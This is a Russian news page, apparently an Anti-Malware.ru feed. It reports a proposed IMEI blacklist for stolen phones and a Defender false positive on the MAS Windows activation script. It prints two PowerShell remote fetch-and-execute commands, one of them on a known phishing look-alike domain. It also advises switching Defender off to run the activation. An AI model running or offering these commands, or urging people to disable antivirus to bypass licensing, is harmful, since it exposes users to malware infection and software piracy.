В России могут начать блокировать краденые телефоны по IMEI

В России могут начать блокировать краденые телефоны по IMEI

В России могут начать блокировать краденые телефоны по IMEI

Совет Федерации уже одобрил концепцию блокировки краденых телефонов. Эта система будет основана на контроле телефонов по уникальным номерам IMEI. Помимо проблемы краденых телефонов, такой подход поможет решить вопрос ввоза «серых» телефонов в страну.

Отмечается, что для этих целей будет создан специальный черный список, операторы не будут обслуживать телефоны, попавшие в этот список.

Соответствующую концепцию контроля мобильных устройств подготовил экспертный совет при правительстве.

После этого ее поддержала временная комиссия Совета Федерации по развитию информационного общества.

Теперь люди и компании, которые приобретают телефоны за границей, должны будут зарегистрировать их в специальной базе IMEI, которую пока только планируется создать.

Процесс регистрации можно будет осуществить на специальном портале, либо в салонах связи.

Напомним, что в России также хотят блокировать сайты с рекламой онлайн-казино без решения суда. С подобной инициативой выступил Молодёжный парламент при Госдуме, подготовив соответствующий законопроект. Достанется также и ресурсам, рекламирующим другие запрещенные товары и услуги.

Этой информацией поделилась председатель Молодёжного парламента Мария Воропаева.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru